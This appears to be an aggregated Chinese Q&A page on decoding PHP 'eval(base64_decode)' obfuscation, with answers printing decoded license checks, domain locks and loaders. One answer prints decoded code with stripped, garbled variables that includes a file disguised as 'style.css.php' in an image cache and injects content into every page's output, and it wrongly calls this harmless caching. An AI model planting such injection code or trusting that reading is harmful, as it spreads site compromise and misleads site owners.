㈠ 解密php eval(base64_decode方法
对于第一段:
eval(base64_decode('90ZXJfdCgpOw=='));
你可以编写如下的测试程序:
<?php
exit(base64_decode('90ZXJfdCgpOw=='));
?>
在命令行执行上面的测试程序,输出结果如下:
function theme_footer_t() { if (!(function_exists("check_theme_footer") && function_exists("check_theme_header"))) { theme_usage_message(); die; } } theme_footer_t();
上面输出的结果,可以替换测试你的第一段代码,它们完全等效,或者说就是解密后的代码,你掌握这个方法,PHP根本就是不可能真正加密的,都是欺负初学者而已。
㈡ eval(base64_decode解密,要方法,行的有追加
没有用的,加密使你的网页性能下降,搜索引擎排名下降,真正想抄你网页的,找个懂技术的,十分钟就破解了,人家只需要从外部注入一个js,弹出dom就行了
㈢ PHP解密 eval( base64_decode
这两个函数在php中是用得对php代码进行加密与解密码的base64_encode是加密,尔base64_decode是解密了,下面我们看两个简单实例。
base64_encode语法: string base64_decode(string data);
*/
$str='='; //定义字符串
echo base64_decode($str); //www.111cn.net一聚教程网 //输出解码后的内容/*
base64_encode语法: string base64_encode(string data);
*/
$str='www.111cn.net一聚教程网'; //定义字符串
echo base64_encode($str); // = //输出编码后的内容
看一下这个会不会对你有帮助。
㈣ 帮我把这里的PHP代码中的eval base64_decode解密,谢谢
这段代码下面应该还有一段base64编码串 ,这段代码读取自身文件再解密。这段代码原文如下:
<?php
$IIIIIIIlIIII='mysql_close';
$IIIIIIIIII1l='mysql_query';
$IIIIIIIIII1I='mysql_error';
$IIIIIIIIIII1='mysql_connect';
$file=__FILE__;
if(!0)$fp=fopen($file,'rb');
fread($fp,1313);
$b64code=base64_decode(strtr(fread($fp,380),'RAO/+Csb=','+/'));
eval($b64code);
return;
?>
㈤ 麻烦这段eval(base64_decode帮忙解密,顺便看下是什么程序
以下是解密的代码
<?
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/zoolgolf/public_html/ed-hardy-online.com/phpThumb/cache/8/84/84d/84d2/style.css.php')){include_once('/home/zoolgolf/public_html/ed-hardy-online.com/phpThumb/cache/8/84/84d/84d2/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($){$=ord(substr($,3,1));$=10;$=0;if($&4){$=unpack('v',substr($,10,2));$=$[1];$+=2+$;}if($&8){$=strpos($,chr(0),$)+1;}if($&16){$=strpos($,chr(0),$)+1;}if($&2){$+=2;}$=gzinflate(substr($,$));if($===FALSE){$=$;}return $;}}function dgobh($){Header('Content-Encoding: none');$=gzdecode($);if(preg_match('/\]*\>)/si','$1'.gml(),$);}else{return gml().$;}}ob_start('dgobh');}}}
?>
至于功能,没有相关函数无法判断,只是感觉是使用php做了数据缓存
㈥ PHP解密 eval( base64_decode
不错,回了无数多这种所谓的“解密”帖子,总算看见有人知道怎么搞了,高兴ing
等效的代码如下:
<?php
class MoleObject extends MasterObject
{
var $FormHandler = null;
var $IoHandler=null;
function MoleObject($config)
{
error_reporting(0);
$this->MasterObject($config);if(18869722 && !defined("LICENSE_VAR_CODE"))exit(86707181);if(substr(md5_FILE("./include/function/global.func.php"),3,25)!=substr("",3,25))
{
error_reporting(0);
ob_clean();
for($s=11677216;$s>0;$s*=65085748){;}
}
$this->FormHandler=new FormHandler;
include_once(LIB_PATH.'io.han.php');
$this->IoHandler=new IoHandler;
$this->Execute();
}
function Execute()
{
switch($this->Code)
{
case 'modify_normal':
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
case 'domodify_normal':
include(MOD_PATH.(($_obfuscate_shAHJlhD4Ndn=2147483647 & -1818658825)%27).'/'.$_obfuscate_shAHJlhD4Ndn.'.php');
break;
case 'modify_credits':
include(MOD_PATH.(($_obfuscate_2GWWxUEK7ztH=2147483647 & 890135736)%27).'/'.$_obfuscate_2GWWxUEK7ztH.'.php');
break;
case 'domodify_credits':
include(MOD_PATH.(($_obfuscate_JQQuH5KF9jyy=2147483647 & -679717690)%27).'/'.$_obfuscate_JQQuH5KF9jyy.'.php');
break;
case 'modify_header_menu':
$this->ModifyHeaderMenu();
break;
case 'domodify_header_menu':
$this->DoModifyHeaderMenu();
break;
case 'modify_header_sub_menu':
$this->ModifyHeaderSubMenu();
break;
case 'modify_header_sub_menu':
$this->DoModifyHeaderSubMenu();
break;
case 'modify_rewrite':
include(MOD_PATH.(($_obfuscate_r4cRb866G31X=2147483647 & -374888374)%27).'/'.$_obfuscate_r4cRb866G31X.'.php');
break;
case 'domodify_rewrite':
include(MOD_PATH.(($_obfuscate_kFjsOxTxxTm5=2147483647 & 1196688474)%27).'/'.$_obfuscate_kFjsOxTxxTm5.'.php');
break;
case 'modify_remote':
include(MOD_PATH.(($_obfuscate_dmnWYBFfwPZy=2147483647 & -1814999975)%27).'/'.$_obfuscate_dmnWYBFfwPZy.'.php');
break;
case 'domodify_remote':
include(MOD_PATH.(($_obfuscate_M9T56w4hBGsk=2147483647 & 332943561)%27).'/'.$_obfuscate_M9T56w4hBGsk.'.php');
break;
case 'modify_filter':
include(MOD_PATH.(($_obfuscate_gWUtSmmgjtIp=2147483647 & -962910372)%27).'/'.$_obfuscate_gWUtSmmgjtIp.'.php');
break;
case 'domodify_filter':
include(MOD_PATH.(($_obfuscate_robepjimEUCI=2147483647 & -659464081)%27).'/'.$_obfuscate_robepjimEUCI.'.php');
break;
case 'modify_latest_search':
$this->ModifyLatestSearch();
break;
case 'domodify_latest_search':
$this->DoModifyLatestSearch();
break;
case 'modify_access':
include(MOD_PATH.(($_obfuscate_RFZWBU9N2FLm=2147483647 & 975168040)%27).'/'.$_obfuscate_RFZWBU9N2FLm.'.php');
break;
case 'domodify_access':
include(MOD_PATH.(($_obfuscate_Ig1RqxiYeBex=2147483647 & 1791127976)%27).'/'.$_obfuscate_Ig1RqxiYeBex.'.php');
break;
case 'modify_seccode':
include(MOD_PATH.(($_obfuscate_yNun8HVOF41M=2147483647 & -1132193474)%27).'/'.$_obfuscate_yNun8HVOF41M.'.php');
break;
case 'do_modify_seccode':
include(MOD_PATH.(($_obfuscate_RqGJmKOedTlZ=2147483647 & 305153614)%27).'/'.$_obfuscate_RqGJmKOedTlZ.'.php');
break;
case 'modify_smtp':
include(MOD_PATH.(($_obfuscate_GZvqIIYIxcwR=2147483647 & -2091071938)%27).'/'.$_obfuscate_GZvqIIYIxcwR.'.php');
break;
case 'do_modify_smtp':
include(MOD_PATH.(($_obfuscate_eUDxyTQSnmWA=2147483647 & -25441582)%27).'/'.$_obfuscate_eUDxyTQSnmWA.'.php');
break;
case 'modify_right':
include(MOD_PATH.(($_obfuscate_L6pnR8LaKmYu=2147483647 & -29905623)%27).'/'.$_obfuscate_L6pnR8LaKmYu.'.php');
break;
case 'do_modify_right':
include(MOD_PATH.(($_obfuscate_umtTsFNTDQ2i=2147483647 & -1934952338)%27).'/'.$_obfuscate_umtTsFNTDQ2i.'.php');
break;
case 'modify_shortcut':
include(MOD_PATH.(($_obfuscate_Po7xayJ0iz3x=2147483647 & -371519643)%27).'/'.$_obfuscate_Po7xayJ0iz3x.'.php');
break;
case 'do_modify_shortcut':
include(MOD_PATH.(($_obfuscate_cFcMlzVkWpGo=2147483647 & 1925297631)%27).'/'.$_obfuscate_cFcMlzVkWpGo.'.php');
break;
default:
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
}
}
function _saveRewriteConfig($domain,$name,$config)
{
return include(MOD_PATH.(($_obfuscate_OeWNnsry3PMy=2147483647 & -1082551710)%27).'/'.$_obfuscate_OeWNnsry3PMy.'.php');
}
function _writeHtaccess($abs_path)
{
return include(MOD_PATH.(($_obfuscate_x8rztwAyS8f1=2147483647 & -315296549)%27).'/'.$_obfuscate_x8rztwAyS8f1.'.php');
}
}
?>
注意看13行,这里其实是在检测另外的文件是否被解密,注意是否有其它文件类似的办法来检测你这个程序。
㈦ PHP 代码解密eval(base64_decode---请附解密方法,
这样的帖子回过无数个了,所有PHP的解密都是把eval换为echo就可以了,没有什么技术可言。
本程序的解密方法参见我在这个帖子的回复:
http://..com/question/115135906.html
你以上内容解密后是:
while(((isset($HTTP_SERVER_VARS['SERVER_NAME']))&&(!eregi('((.*\.)?y363\.cn)|((\.*\\.)?localhost)',$HTTP_SERVER_VARS['SERVER_NAME'])))||((isset($_SERVER['HTTP_HOST']))&&(!ereg
明显你上面的程序没有完整,你可以使用下面的程序获得完整的解密后的代码:
echo base64_decode(strtr('I/S+AeLTP6S++s9HTWvVFyvI+P6QTP6CK86C+lXLUyXLUNagLxXsxc+/','+K1OZ3b7jFwcx/iCfd0qNko=','+/'));
第一个字符串就是源文件?>之后的内容,你粘贴完整的替换即可。
㈧ PHP解密 eval( base64_decode
运行php代码(base64解码(base64加密内容));
此代码常用于php木马及小马中
目前已知应用此代码的php木马有:
黑狼PHP木马